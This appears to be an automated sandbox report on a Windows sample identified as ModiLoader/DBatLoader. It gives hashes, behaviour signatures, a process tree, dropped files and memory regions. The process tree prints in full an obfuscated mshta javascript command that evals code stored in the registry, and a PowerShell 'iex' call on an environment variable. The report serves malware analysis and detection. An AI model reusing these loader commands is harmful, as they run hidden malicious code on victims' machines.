Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 05:27

General

  • Target

    1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe

  • Size

    356KB

  • MD5

    1f98f4990bbf6b268365ba7fdf56405f

  • SHA1

    e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317

  • SHA256

    5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f

  • SHA512

    bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f

  • SSDEEP

    6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5h:W/cMVDxFu43cHYf1TPCAxjzMj

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Looks for VMWare Tools registry key
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VMWare Tools registry key
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of UnmapMainImage
      PID:2308
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:wh5VXfF0="RGcF6bBbn8";J3G3=new%20ActiveXObject("WScript.Shell");SsG4Jhybu="zl6rcltazH";Lcu0I=J3G3.RegRead("HKLM\\software\\Wow6432Node\\QpgStiGQ4\\NzOMWkbXt");Lqt0swCDV="XirWa1";eval(Lcu0I);cRNm3TX="ny";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:amuexm
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2140
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:2876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d

      Filesize

      10KB

      MD5

      1e74f54983f584fb375997f6d710fcc5

      SHA1

      e29d7ef56bd7b0d365e4154e7fa13a56dbdb8d9f

      SHA256

      163a3152a25643419866d8d77145766341a0c8aab5f041f28b8d30b87610b1be

      SHA512

      79434d6e22b91427bf4846efcd6a88a1752a28c577dd65b28ba761d82fdba6567ce42458bba5563ccb8041e766e35a4021e5200a6647ddc9d38f4102e8978164

    • C:\Users\Admin\AppData\Local\416844\7efaba.bat

      Filesize

      61B

      MD5

      a9d3ea542d72c3d4eb6e79b37f9b265e

      SHA1

      9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9

      SHA256

      d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314

      SHA512

      eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

    • C:\Users\Admin\AppData\Local\416844\eecdc5.lnk

      Filesize

      881B

      MD5

      fda8ceca25b52950b08c0f043937cecb

      SHA1

      5cf5d7016ab5b938ded88c6ca5e2a23fe34f6820

      SHA256

      9eab49ea41f5fe232064099743a5d1b73c172f14eb2941b1d740f55b547c7822

      SHA512

      df7b8749d776077a24a6d9b5517b071b6497bc0232027bec799efe2ea6428203a299dd8cdd56f34498400423633f82ad73d5c4431b6777aa04dc5ab2e8fa1653

    • C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d

      Filesize

      2KB

      MD5

      14d6113f0996400fbfc9e43e66608164

      SHA1

      1e9f4c8b164b04254a56374506c6615f78ef879b

      SHA256

      dbfdb41e2c34703b6d471705ecd3a00d9b21b3e4777babf0b0077e6f26885099

      SHA512

      a507ee36325ac7ba7021230f1536dd8f5569f1da3f8549d5c245e862fb45fd800946a7b0793ed48bed0b082a1db8e058b074bc020273879d8982b09a28bd3da6

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk

      Filesize

      991B

      MD5

      d5bcec5b230d761d784e7aac99b76091

      SHA1

      a8f306eb2135a2a7ea3b52a86f0f4a0d6ac74d00

      SHA256

      41de7af6eb3efa1d53733bf5717bc833ab6033d0e49ec207c7a67531bbb28053

      SHA512

      ac8463090bd2dea9627bd12ff335c5380a4e247a0bd70fb71fcad4cf0c001f14cf97aebd405d017fe3e4d5e41f0ca4ce8a8345f35842241375e0a5f83b55ca39

    • \Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe

      Filesize

      356KB

      MD5

      1f98f4990bbf6b268365ba7fdf56405f

      SHA1

      e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317

      SHA256

      5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f

      SHA512

      bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f

    • memory/2140-52-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-66-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-67-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-58-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-45-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-42-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-36-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-47-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-46-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-56-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-37-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-48-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-49-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-32-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-34-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-54-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-40-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-43-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-44-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-41-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-38-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-50-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-51-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-39-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-75-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-57-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-74-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-65-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-64-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-63-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-55-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2140-53-0x0000000000240000-0x000000000037E000-memory.dmp

      Filesize

      1.2MB

    • memory/2308-24-0x00000000002E0000-0x0000000000327000-memory.dmp

      Filesize

      284KB

    • memory/2308-25-0x00000000002E0000-0x0000000000327000-memory.dmp

      Filesize

      284KB

    • memory/2340-15-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-5-0x0000000000350000-0x0000000000357000-memory.dmp

      Filesize

      28KB

    • memory/2340-17-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-0-0x0000000000220000-0x0000000000267000-memory.dmp

      Filesize

      284KB

    • memory/2340-119-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-13-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-27-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-26-0x0000000000400000-0x000000000043E000-memory.dmp

      Filesize

      248KB

    • memory/2340-20-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-14-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-19-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-18-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-1-0x0000000000220000-0x0000000000267000-memory.dmp

      Filesize

      284KB

    • memory/2340-16-0x0000000001EA0000-0x0000000001F74000-memory.dmp

      Filesize

      848KB

    • memory/2340-4-0x00000000002B0000-0x00000000002B5000-memory.dmp

      Filesize

      20KB

    • memory/2340-3-0x0000000000400000-0x000000000043E000-memory.dmp

      Filesize

      248KB

    • memory/2812-31-0x00000000061E0000-0x00000000062B4000-memory.dmp

      Filesize

      848KB

    • memory/2812-35-0x00000000061E0000-0x00000000062B4000-memory.dmp

      Filesize

      848KB

    • memory/2876-90-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-89-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-88-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-87-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-85-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-97-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-84-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-95-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-92-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-91-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-86-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-83-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-81-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-93-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-94-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-96-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-99-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-98-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB

    • memory/2876-82-0x00000000002A0000-0x00000000003DE000-memory.dmp

      Filesize

      1.2MB